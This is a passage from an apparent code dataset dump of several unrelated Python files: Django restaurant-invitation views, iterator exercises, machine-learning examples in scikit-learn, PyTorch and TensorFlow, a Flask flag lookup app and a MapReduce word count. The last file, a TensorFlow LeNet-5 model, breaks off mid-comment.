Selected tables are already reserved!\"\n })\n\n # if everything was fine create new visit object\n stops = this_reservation.get_finishing_time()\n new_visit = Visit.objects.create(ending_time=stops, confirmed=True, reservation=this_reservation, guest=this_guest)\n new_visit.save()\n print(\"Success! Created new visit: \" + str(new_visit))\n list_of_friends = get_friends_list(this_guest)\n return render(request, 'restaurant/reservation_friends.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'reservation': this_reservation,\n 'friends': list_of_friends\n })\n\n\n\n@login_required(login_url='')\ndef invitefriends(request, guest_id, restaurant_id, reservation_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_reservation = get_object_or_404(Reservation, pk=reservation_id)\n # get friends list\n friend_list = get_friends_list(this_guest)\n selected_friends = []\n if request.method == 'POST':\n # collect friends\n for f in friend_list:\n if request.POST.get(str(f.id)):\n selected_friends.append(f)\n # if there is no selected friends, send to my reservations\n if len(selected_friends) == 0:\n return HttpResponseRedirect(reverse('restaurant:myreservations', args=(guest_id, )))\n else:\n # send mail invitations and create visit objects\n stops = this_reservation.get_finishing_time()\n for this_friend in selected_friends:\n print(\"Working for: \" + str(this_friend))\n friend_guest = get_object_or_404(Guest, pk=this_friend.id)\n new_visit = Visit.objects.create(ending_time=stops, confirmed=False, reservation=this_reservation,\n guest=friend_guest)\n new_visit.save()\n print(\"Success! Created new visit: \" + str(new_visit))\n # send_mail\n message_text = \"You got an invitation to visit Restaurant. Login and follow link to see more:\\n\\n\"\n link_text = \"http://127.0.0.1:8000/restaurant/showinvitation/\"+str(friend_guest.id)+\"/\"+reservation_id+\"/\"+str(new_visit.id)+\"/\"\n text_to_send = message_text + link_text\n send_mail('Restaurant - Invitation', text_to_send, 'vdragan1993@gmail.com', [friend_guest.user.username],\n fail_silently=False)\n print(\"Success! 
Mail sent to: \" + str(friend_guest))\n # all finished\n return HttpResponseRedirect(reverse('restaurant:myreservations', args=(guest_id, )))\n\n\n\n@login_required(login_url='/')\ndef showinvitation(request, guest_id, reservation_id, visit_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_reservation = get_object_or_404(Reservation, pk=reservation_id)\n this_visit = get_object_or_404(Visit, pk=visit_id)\n right_now = timezone.now()\n if right_now > this_visit.ending_time:\n return render(request, 'restaurant/reservation_confirm.html', context={\n 'guest': this_guest,\n 'reservation': this_reservation,\n 'visit': this_visit,\n 'show': False,\n 'error_message': \"Time's up!\"\n })\n else:\n if this_visit.confirmed:\n return render(request, 'restaurant/reservation_confirm.html', context={\n 'guest': this_guest,\n 'reservation': this_reservation,\n 'visit': this_visit,\n 'show': False,\n 'info_message': \"Invitation already confirmed!\"\n })\n else:\n return render(request, 'restaurant/reservation_confirm.html', context={\n 'guest': this_guest,\n 'reservation': this_reservation,\n 'visit': this_visit,\n 'show': True\n })\n\n\n@login_required(login_url='/')\ndef acceptinvitation(request, guest_id, reservation_id, visit_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_reservation = get_object_or_404(Reservation, pk=reservation_id)\n this_visit = get_object_or_404(Visit, pk=visit_id)\n new_visit = Visit.objects.get(pk=visit_id)\n new_visit.confirmed = True\n new_visit.save()\n print(\"Success! Confirmed Visit: \" + str(this_visit))\n return render(request, 'restaurant/reservation_confirm.html', context={\n 'guest': this_guest,\n 'reservation': this_reservation,\n 'visit': this_visit,\n 'info_message': \"Invitation Accepted!\"\n })","sub_path":"restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":39261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288766914","text":"import re\nimport reprlib\n\nRE_WORD = re.compile('\\w+')\n\n'''\nclass Sentence:\n def __init__(self, text:str):\n self.text = text\n self.words = RE_WORD.findall(text)\n \n def __getitem__(self, index:int) -> 'item':\n return self.words[index]\n \n def __len__(self) -> int:\n return len(self.words)\n \n def __repr__(self) ->str:\n return 'Sentence(%s)' % reprlib.repr(self.text)\n \n def __iter__(self):\n return SentenceIterator(self.words)\n \nclass SentenceIterator:\n def __init__(self, words):\n self.words = words\n self.index = 0\n \n def __next__(self):\n try:\n word = self.words[self.index]\n except IndexError:\n raise StopIteration()\n self.index += 1\n return word\n \n def __iter__(self):\n return self\n'''\n\n'''\nclass Sentence:\n def __init__(self, text):\n self.text = text\n self.words = RE_WORD.findall(text)\n \n def __repr__(self):\n return 'Sentence(%s)' % reprlib.repr(self.text)\n \n def __iter__(self):\n for word in self.words:\n yield word\n return\n'''\n\nclass Sentence:\n def __init__(self,text):\n self.text = text\n \n def __repr__(self):\n return 'Sentence(%s)' % reprlib.repr(self.text)\n \n def __iter__(self):\n #for match in RE_WORD.finditer(self.text):\n # yield match.group()\n return (match.group() for match in RE_WORD.finditer(self.text))\n\ns = Sentence('\"The time has come,\" the Walrus said,')\nprint(s)\n\nfor word in s:\n print(word)\n\n#print(s[1])\n\ns = 'ABC'\n\nit = iter(s)\n\nwhile True:\n try:\n print(next(it))\n except StopIteration:\n del it\n break\n\n\nclass 
ArithmeticProgression:\n def __init__(self, begin, step, end = None):\n self.begin = begin\n self.step = step\n self.end = end \n \n def __iter__(self):\n result = type(self.begin + self.step)(self.begin)\n forever = self.end is None\n index = 0\n while forever or result < self.end:\n yield result\n index += 1\n result = self.begin + self.step * index\n\nimport itertools\ngen = itertools.count(1,.5)\n\nprint(next(gen))\nprint(next(gen))\nprint(next(gen))\n\ngen = itertools.takewhile(lambda n: n < 3, itertools.count(1,0.5))\nprint(list(gen))\n\n\ndef aritprog_gen(begin,step,end=None) -> iter:\n first = type(begin + step)(begin)\n ag_gen = itertools.count(first,step)\n if end is not None:\n ag_gen = itertools.takewhile(lambda n:n max_reward:\n max_reward = total_reward\n \n print(\"\\n Episodio {} finalizado con {} iteraciones, Recompensa= {}, Recompenda media= {}, Mejor recompensa= {}\".\n format(episode, step+1, total_reward, np.mean(episode_rewards), max_reward))\n \n if agent.memory.get_size() > 100:\n agent.replay_experience(32)\n \n break\n \n env.close()","sub_path":"swallowQLearner.py","file_name":"swallowQLearner.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341387460","text":"# append\r\na = [1, 2, 3, 4]\r\na.append(5)\r\nprint(a)\r\n\r\n# sort\r\n\r\na = [1, 4, 5, 2, 6, 8, 2, 9, 4]\r\na.sort(reverse=True)\r\nprint(a)\r\n\r\n# reverse\r\na.reverse()\r\nprint(a)\r\n\r\n# index\r\nprint(a.index(4))\r\n\r\n# insert\r\na = [1, 4, 5, 2, 6, 8, 2, 9, 4]\r\na.insert(2,\"4\")\r\nprint(a)\r\n\r\na = [1, 4, 5, 2, 6, 8, 2, 9, 4]\r\nb = a[:2]\r\nc = a[2:]\r\nprint(b + [4, '4'] + c)\r\n\r\na.remove(2)\r\nprint(a)\r\n\r\n# pop\r\nlst = [1, 2, 3, 4, 5, 6, 7]\r\nlst.pop()\r\nprint(lst.pop())\r\n\r\n# Difference between extend and +\r\n# + keeps the original list intact, while extend does not (it mutates the original in place).\r\n# Note: append adds its argument as a single element.\r\n\r\n\r\nlst = [3, 4, 'C', 'd']\r\nPop = lst.pop(2)\r\n\r\nprint(Pop)\r\n\r\n\r\n# For list methods it is not necessary to distinguish whether they take an index or the element itself.\r\n# If you mix element-taking methods with index-taking ones, an element-taking call can be used as if it took an index.\r\n\r\n\r\n\r\n","sub_path":"sample5.py","file_name":"sample5.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651225012","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views.generic import TemplateView, ListView, DetailView, DeleteView, UpdateView\nfrom .models import Tweet\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass BaseView(TemplateView):\n template_name = 'blog_base.html'\n\nclass BlogListView(ListView):\n template_name = 'List_view.html'\n context_object_name = 'lists'\n queryset = Tweet.objects.all()\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['data'] = Tweet.objects.get_matts_post(1)\n return context\nclass UserList(ListView):\n template_name = 'User_List_view.html'\n context_object_name = 'user_lists'\n queryset = User.objects.all()\nclass UserDetail_View(DetailView):\n template_name = 'User_detail_view.html'\n context_object_name = 'user_detail'\n queryset = User.objects.all()\n\n","sub_path":"User_profile/user_profile/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"507517757","text":"# SVR regression\r\n\r\n\r\n# Importing the libraries\r\nimport 
numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('Position_Salaries.csv')\r\nX = dataset.iloc[:, 1:2].values\r\ny = dataset.iloc[:, -1:].values\r\n\r\n# Splitting the dataset into the Training set and Test set\r\n\"\"\"from sklearn.cross_validation import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\"\"\"\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nsc_y = StandardScaler()\r\nX = sc_X.fit_transform(X)\r\ny = sc_y.fit_transform(y)\r\n\r\n# SVR regression model. Note: SVR does not do feature scaling on its own, hence the explicit scaling above\r\nfrom sklearn.svm import SVR\r\nregressor = SVR(kernel='rbf', gamma='auto')\r\nregressor.fit(X, y)\r\n\r\n# Predicting a new result (use transform, not fit_transform, so the scaler fitted on X is reused)\r\ny_pred = sc_y.inverse_transform(regressor.predict(sc_X.transform(np.array([[6.5]]))))\r\n\r\n# Visualising the Regression results\r\nplt.scatter(X, y, color = 'red',label='actual stat')\r\nplt.plot(X, regressor.predict(X), color = 'blue',label='predicted stat')\r\nplt.legend()\r\nplt.title('Truth or Bluff (SVR Model)')\r\nplt.xlabel('Position level')\r\nplt.ylabel('Salary')\r\nplt.show()","sub_path":"svr_self.py","file_name":"svr_self.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"302292072","text":"from flask import Flask\nfrom flask import request\nfrom flask import render_template\nimport requests\n\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = False\n\n\n@app.route(\"/\", methods=['POST', 'GET'])\ndef home_view():\n if request.method == 'POST':\n country = request.form['country']\n try:\n url_for_request = f'https://restcountries.eu/rest/v2/name/{country}'\n response = requests.get(url_for_request)\n data = response.json()[0]\n url = data.get('flag')\n except Exception:\n return render_template('error.html', name=country)\n return render_template('flag.html', url=url)\n return render_template('home.html')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132803591","text":"''' Layers\n This file contains various layers for the BigGAN models.\n'''\nimport functools\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.nn import Parameter as P\nfrom torch.autograd import Variable\n\n\nfrom layer_conv_select_generate_mask import *\nfrom layer_recon import *\n#################################################\n# idea: convolutional selection #\n#################################################\n\"\"\"perform hypercolumn sparsity within each scope\"\"\"\n\nclass NeuralConvSelection(nn.Module):\n \"\"\"conv select\"\"\"\n def __init__(self, ch, resolution, kernel_size, vc_dict_size=100, no_attention=False, hard_selection=False, which_mask=\"1.0\", \\\n sparse_vc_prob_interaction=4, vc_type=\"parts\", test=False, pull_vc_activation=0.25):\n super(NeuralConvSelection, self).__init__()\n self.kernel_size = kernel_size\n self.ch = ch\n self.which_mask = which_mask\n self.test = test \n self.pull_vc_activation = pull_vc_activation\n if which_mask == '1.0':\n self.generate_mask = GenerateMask(ch, resolution=kernel_size, or_cadidate=vc_dict_size, no_attention=no_attention) # shared 
generate mask module, generate a weighted mask for \n elif float(which_mask) >= 2.0 and (float(which_mask) < 3.0):\n self.generate_mask = GenerateMask_2_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size) # shared generate mask module, generate a weighted mask for \n self.integrate_mask_activation = nn.Sequential(\n nn.Linear(ch + kernel_size * kernel_size, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.Tanh()\n )\n elif (float(which_mask) >= 3.0) and (float(which_mask) < 5.0):\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, sparse_vc_prob_interaction=sparse_vc_prob_interaction, vc_type=vc_type) # shared generate mask module, generate a weighted mask for \n self.integrate_mask_activation = nn.Sequential(\n nn.Linear(ch + kernel_size * kernel_size, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.Tanh()\n )\n elif (float(which_mask) >= 5.0) and (float(which_mask) < 6.0):\n print(\"=== in select build 5.0 mask ===\")\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, sparse_vc_prob_interaction=sparse_vc_prob_interaction, \n vc_type=vc_type, reg_entropy=True) # regularize the negative entropy of vc prob\n self.integrate_mask_activation = nn.Sequential(\n nn.Linear(ch + kernel_size * kernel_size, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.Tanh()\n )\n elif float(which_mask) >= 6.0 and (float(which_mask) < 7.0):\n if float(which_mask) == 6.1:\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction, \\\n warmup=54360, \n vc_type=vc_type, reg_entropy=True, no_map=True, pull_vc_activation=[self.pull_vc_activation,])\n elif float(which_mask) == 6.2:\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction, \\\n warmup=54360, \n vc_type=vc_type, reg_entropy=True, no_map=True, \\\n pull_vc_activation=[self.pull_vc_activation,], replace_activation=True)\n else:\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, sparse_vc_prob_interaction=sparse_vc_prob_interaction, \n vc_type=vc_type, reg_entropy=True, no_map=True) # regularize the negative entropy of vc prob\n elif float(which_mask) >= 7.0 and (float(which_mask) < 8.0):\n # condition on vc to force network learn different output\n if float(which_mask) == 7.0:\n self.generate_mask = GenerateMask_4_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction, \\\n warmup=543600,\n vc_type=vc_type, reg_entropy=True, no_map=True, pull_vc_activation=[self.pull_vc_activation,])\n self.integrate_vc_activation = nn.Sequential(\n nn.Linear(ch * 2, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.Tanh()\n )\n self.force_output_contain_vc = nn.Sequential(\n nn.Linear(ch, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.LeakyReLU(0.2),\n )\n else:\n raise NotImplementedError(f\"which_mask {which_mask} is not implemented in NeuralConvSelection module\")\n \n self.unfold = nn.Unfold(kernel_size=(kernel_size, kernel_size), stride=3)\n\n def forward(self, x):\n \"\"\"\n x: [n, c, h, w]\n output: [n, L, c]\n \"\"\"\n n, c, h, w = x.shape\n x = self.unfold(x) # [n, c * kernel * kernel, L]\n L = x.shape[2]\n x = 
torch.transpose(x, 1, 2).view(n, -1, c, self.kernel_size, self.kernel_size) # [n, L, c, kernel, kernel]\n # print(f\"x shape before mask {x.shape}\")\n if self.which_mask == '1.0':\n x_mask, prob_vector, prob_vector_previous, origin_dot_product = self.generate_mask(x) # [n * L, 1, kernel, kernel]\n \n x = (x_mask * x.reshape(-1, c, self.kernel_size, self.kernel_size)).sum((2,3)) # [n * L, c, kernel, kernel] -> [n * L, c]\n x = x.view(-1, L, c) # [n, L, c]\n return x, (x_mask.reshape(n, L, self.kernel_size, self.kernel_size), prob_vector.reshape(n, L, -1), prob_vector_previous.reshape(n, L, -1), \n origin_dot_product.reshape(n, L, -1, self.kernel_size, self.kernel_size))\n elif (float(self.which_mask) >= 2.0) and (float(self.which_mask) < 5.0):\n vc, sim_map_max = self.generate_mask(x) # [n * L, c], [n * L, 1, h, w]\n integrate_input = torch.cat([vc, sim_map_max.view(n * L, -1)], dim=1)\n # print(f\"input *************************** {integrate_input.sum()}\")\n integrated_output = self.integrate_mask_activation(integrate_input) # [n * L, c]\n # print(f\"integreated mask activation ===================== {integrated_output.mean()}\")\n return integrated_output.view(-1, L, c), None # [n, L, c]\n elif (float(self.which_mask) >= 5.0) and (float(self.which_mask) < 6.0):\n # introduce maximun entropy \n # print(f\"===== test? {self.test}\")\n vc, sim_map_max, neg_entorpy = self.generate_mask(x, test=self.test) # [n * L, c], [n * L, 1, h, w], scaler\n # print(f\"sim_map_max {sim_map_max.shape}\")\n # print(f\"vc {vc.shape}\")\n integrate_input = torch.cat([vc, sim_map_max.view(-1, self.kernel_size * self.kernel_size)], dim=1)\n # print(f\"input *************************** {integrate_input.sum()}\")\n integrated_output = self.integrate_mask_activation(integrate_input) # [n * L, c]\n # print(f\"integreated mask activation ===================== {integrated_output.mean()}\")\n return integrated_output.view(-1, L, c), neg_entorpy # [n, L, c], scaler\n elif float(self.which_mask) >= 6.0 and (float(self.which_mask) < 7.0):\n # introduce maximun entropy \n vc, sim_map_max, neg_entorpy = self.generate_mask(x, test=self.test) # [n * L, c], None, scaler\n \n # print(f\"integreated mask activation ===================== {integrated_output.mean()}\")\n return vc.view(-1, L, c), neg_entorpy # [n, L, c], scaler\n elif float(self.which_mask) >= 7.0:\n if float(self.which_mask) == 7.0:\n vc_activation, sim_map_max, additional = self.generate_mask(x, test=self.test) # [n * L, 2c], [n * L, 1, h, w], scaler\n # integrate_input\n integrated_output = self.integrate_vc_activation(vc_activation) # [n *L, 2c] -> [n *L, c]\n # make the integrated_output contain vc information\n approx_vc = self.force_output_contain_vc(integrated_output)\n loss_use_vc = ((approx_vc - vc_activation[:, c:])**2).mean() * 100\n print(f\"loss_use_vc {loss_use_vc}\")\n additional += loss_use_vc\n return integrated_output.view(-1, L, c), additional\n\n\n\n\n\n#################################################\n# Conv Select main #\n#################################################\nclass SparseNeuralConv(nn.Module):\n \"\"\"main class to conv select and conv reconstruct\"\"\"\n def __init__(self, topk, ch, resolution, kernel_size, vc_dict_size, no_attention_select=False, sparse_vc_interaction=0, sparse_vc_prob_interaction=4, mode=\"1.0\",\n test=False):\n super(SparseNeuralConv, self).__init__()\n self.myid = \"conv_sparse_vc_recover\"\n self.mode = mode\n self.test = test\n \n if (float(self.mode) < 4.0) or (float(self.mode) >= 5.0 and 
float(self.mode) < 8.0):\n self.select = NeuralConvSelection(ch, resolution, kernel_size, vc_dict_size, no_attention=no_attention_select, which_mask=mode, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction, \\\n test=self.test)\n self.recon = NeuralConvRecon(ch, resolution, kernel_size)\n self.sparse_vc_interaction = sparse_vc_interaction\n if self.sparse_vc_interaction:\n self.attention_modules = nn.ModuleList([BatchedVectorAttention(ch, max(ch // 5, 1)) for _ in range(self.sparse_vc_interaction)])\n \n elif float(self.mode) >= 4.0 and float(self.mode) < 5.0:\n \"\"\"use multiple pathway to help with\"\"\"\n # for objects\n self.select1 = NeuralConvSelection(ch, resolution, kernel_size, vc_dict_size, no_attention=no_attention_select, which_mask=mode, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction,\n vc_type=\"parts\")\n self.recon1 = NeuralConvRecon(ch, resolution, kernel_size)\n self.sparse_vc_interaction = sparse_vc_interaction\n if self.sparse_vc_interaction:\n self.attention_modules1 = nn.ModuleList([BatchedVectorAttention(ch, max(ch // 5, 1)) for _ in range(self.sparse_vc_interaction)])\n \n # for texture\n self.select2 = NeuralConvSelection(ch, resolution, kernel_size, vc_dict_size, no_attention=no_attention_select, which_mask=mode, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction,\n vc_type=\"texture\")\n self.recon2 = NeuralConvRecon(ch, resolution, kernel_size)\n self.sparse_vc_interaction = sparse_vc_interaction\n if self.sparse_vc_interaction:\n self.attention_modules2 = nn.ModuleList([BatchedVectorAttention(ch, max(ch // 5, 1)) for _ in range(self.sparse_vc_interaction)])\n\n\n def forward(self, x, eval_=False, select_index=0, device=\"cuda\"):\n \"\"\"\n x: [n, c, h, w]\n output: [n, c, h, w]\n \"\"\"\n ####### 1.0 #########\n if self.mode == '1.0':\n vcs, (mask_x, prob_vector, previous_prob_vector, origin_map) = self.select(x) # [n, L, c]\n \n if self.sparse_vc_interaction:\n pass\n\n if eval_:\n n, L, c = vcs.shape\n if type(select_index) == int:\n select_index = [select_index]\n select_indexs = select_index # if len(select_index) >= 2 else range(select_index[0])\n select_indexs = torch.LongTensor([i for i in select_indexs]).view(-1, 1).unsqueeze(0).repeat(n, 1, c).to(device)\n # index = (torch.ones(c, dtype=torch.long) * select_index).unsqueeze(0).unsqueeze(0).expand((n,1,c)).to(device)\n vcs = vcs * torch.zeros_like(vcs).scatter_(1, select_indexs, 1.).to(device)\n print(f\"Mask out vcs, testing vc {select_index}\")\n\n x = self.recon(vcs) # [n, c, h, w]\n return x, (mask_x, prob_vector, previous_prob_vector, origin_map)\n \n ####### 2.0+ & 3.0+ #########\n elif float(self.mode) >= 2.0 and float(self.mode) < 4.0:\n\n vcs, _ = self.select(x) # [n, L, c]\n if self.sparse_vc_interaction:\n for attend in self.attention_modules:\n vcs = attend(vcs) # [n, L, c]\n x = self.recon(vcs) # [n, c, h, w]\n return x, None\n elif float(self.mode) >= 4.0 and float(self.mode) < 5.0:\n # first parts\n vcs, _ = self.select1(x) # [n, L, c]\n if self.sparse_vc_interaction:\n for attend in self.attention_modules1:\n vcs = attend(vcs) # [n, L, c]\n x1 = self.recon1(vcs) # [n, c, h, w]\n\n # second parts\n vcs, _ = self.select2(x) # [n, L, c]\n if self.sparse_vc_interaction:\n for attend in self.attention_modules2:\n vcs = attend(vcs) # [n, L, c]\n x2 = self.recon2(vcs) # [n, c, h, w]\n\n x = x1 + x2 \n return x, None # [n, c, h, w]\n elif float(self.mode) >= 5.0 and float(self.mode) < 9.0:\n # in 5.0, introduce maximum entropy princinple\n # print(\"IN 5.0\")\n vcs, 
neg_entorpy = self.select(x) # [n, L, c]\n # print(\"neg_entorpy\", neg_entorpy.item())\n if self.sparse_vc_interaction:\n for attend in self.attention_modules:\n vcs = attend(vcs) # [n, L, c]\n x = self.recon(vcs) # [n, c, h, w]\n return x, neg_entorpy\n\n\n\n\n\n \n\n\n\n","sub_path":"layer_conv_select.py","file_name":"layer_conv_select.py","file_ext":"py","file_size_in_byte":15097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"296778807","text":"# General testing file\nimport sys\nsys.path.append('rplugin/python3') # If calling script from root\nsys.path.append('../rplugin/python3') # If calling script from /tests/\n\nfrom vppm import *\n\ndef testSearch():\n # Search for a plugin\n searcher = PluginSearch()\n results = searcher.search(\"test\")\n\n print (results)\n\n# Call the tests\ntestSearch()\n","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"17016476","text":"import MapReduce\nimport sys\n\n\"\"\"\nWord Count Example in the Simple Python MapReduce Framework\n\"\"\"\n\n#create a MapReduce object that is used to pass data \n#between the map function and the reduce function\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\n#the mapper function tokenizes each document and emits a key-value pair\n#The key is a word formatted as a string and the value is the integer 1 to indicate an occurrence of word\n\ndef mapper(record):\n # key: document identifier\n # value: document contents\n key = record[0]\n value = record[1]\n words = value.split()\n for w in words:\n mr.emit_intermediate(w, 1)\n \n#the reducer function sums up the list of occurrence counts and emits a count for word.\n#Since the mapper function emits the integer 1 for each word, each element in the list_of_values is the integer 1.\n\ndef reducer(key, list_of_values):\n # key: word\n # value: list of occurrence counts\n total = 0\n for v in list_of_values:\n total += v\n mr.emit((key, total))\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","sub_path":"assignment3/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"202227661","text":"from sklearn.neural_network import MLPRegressor\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, cross_val_score\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error, r2_score, confusion_matrix, accuracy_score, classification_report, roc_auc_score,roc_curve\nfrom sklearn.svm import SVC\n\ndiabetes = pd.read_csv('../../reading_data/diabetes.csv')\ndf = diabetes.copy()\ndf = df.dropna()\n\ny = df[\"Outcome\"]\nX = df.drop([\"Outcome\"], axis = 1)\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.30)\n\nsvm_model = SVC(kernel=\"rbf\").fit(X_train, y_train)\ny_pred = svm_model.predict(X_test)\n\nprint('Accuracy:', accuracy_score(y_pred, y_test))\nprint('Rapor:', classification_report(y_pred, y_test))\n\nparams = {\n \"C\": [0.0001, 0.001, 0.1,1,5,10,100],\n \"gamma\" : [0.0001, 0.001, 0.1,1,5,10,100]\n}\n\n# from sklearn.model_selection import 
GridSearchCV\n\n# svc_cv = GridSearchCV(svm_model, params, cv=10, verbose=2, n_jobs=-1)\n# svc_cv.fit(X_train, y_train)\n# print(svc_cv.best_params_)\n\nsvm_tuned_model = SVC(kernel=\"linear\", C=9, gamma=0.0001).fit(X_train, y_train)\ny_tuned_pred = svm_tuned_model.predict(X_test)\n\nprint('Tuned Accuracy:', accuracy_score(y_tuned_pred, y_test))\nprint('Tuned Rapor:', classification_report(y_tuned_pred, y_test))\n\n","sub_path":"machine-learning/classifers/non-linear-svc.py","file_name":"non-linear-svc.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"544869180","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport tensorflow as tf\nimport os\n\n# Define the network parameters: 784 input features, 10 output classes, 500 nodes in the middle layer\nINPUT_NODE = 784\nOUTPUT_NODE = 10\n\n# The input image data is a 28*28*1 3-D matrix; the label is a 10-D vector\nIMAGE_SIZE = 28\nNUM_CHANNELS = 1\nNUM_LABELS = 10\n# Depth and filter size of the first convolutional layer\nCONV1_DEEP = 32\nCONV1_SIZE = 5\n# Depth and filter size of the second convolutional layer\nCONV2_DEEP = 64\nCONV2_SIZE = 5\n# Number of nodes in the fully connected layer\nFC_SIZE = 512\n\n#LAYER1_NODE = 500\n\n# Define the forward pass of the convolutional network. A new parameter 'train' is added to distinguish the training process from the testing process; dropout is used in this program\n# Dropout further improves model robustness and prevents overfitting (it is only applied during training)\ndef inference(input_tensor, train, regularizer):\n\n # Declare the variables of the first convolutional layer and implement its forward pass.\n # Using a separate variable scope per layer isolates the variables of different layers, so names only need to be\n # unique within the current layer and clashes across layers are not a concern.\n # Unlike the standard LeNet-5 model, the convolutional layer here takes the raw 28 * 28 * 1 MNIST image pixels as input.\n # The convolution uses zero padding and outputs a 28 * 28 * 32 matrix\n with tf.variable_scope('layer1_conv1'): # tf.get_variable() places the variable names inside this scope\n conv1_weights = tf.get_variable(\n 'weight',[CONV1_SIZE, CONV1_SIZE, NUM_CHANNELS,CONV1_DEEP],\n initializer = tf.truncated_normal_initializer(stddev=0.1))\n conv1_biases = tf.get_variable(\n 'bias',[CONV1_DEEP],initializer = tf.constant_initializer(0.0))\n\n # Filter of side length 5 and depth 32, stride 1, zero padding\n conv1 = tf.nn.conv2d(\n input_tensor, conv1_weights, strides=[1,1,1,1], padding='SAME')\n relu1 = tf.nn.relu(tf.nn.bias_add(conv1, conv1_biases))\n\n # Forward pass of the second layer (pooling): max pooling, filter side length 2, zero padding, stride 2.\n # Input 28 * 28 * 32, output 14 * 14 * 32\n with tf.name_scope('layer2_pool1'):\n pool1 = tf.nn.max_pool(\n relu1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\n # Declare the variables of the third convolutional layer and implement its forward pass.\n # Input 14 * 14 * 32, output 14 * 14 * 64\n with tf.variable_scope('layer3_conv2'):\n conv2_weights = tf.get_variable(\n 'weight', [CONV2_SIZE,CONV2_SIZE,CONV1_DEEP,CONV2_DEEP],\n initializer = tf.truncated_normal_initializer(stddev=0.1))\n conv2_biases = tf.get_variable(\n 'bias',[CONV2_DEEP], initializer = tf.constant_initializer(0.0))\n\n # Filter of side length 5 and depth 64, stride 1, zero padding\n conv2 = tf.nn.conv2d(pool1, conv2_weights, strides=[1,1,1,1], padding='SAME')\n relu2 = tf.nn.relu(tf.nn.bias_add(conv2, conv2_biases))\n \n # Forward pass of the fourth layer (pooling).\n # Input 14 * 14 * 64, output 7 * 7 * 64\n with tf.name_scope('layer4_pool2'):\n pool2 = tf.nn.max_pool(\n relu2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\n # Convert the output of the fourth (pooling) layer into the input format of the fifth (fully connected) layer.\n # Flatten the 7 * 7 * 64 matrix into a vector.\n # pool2.get_shape() returns 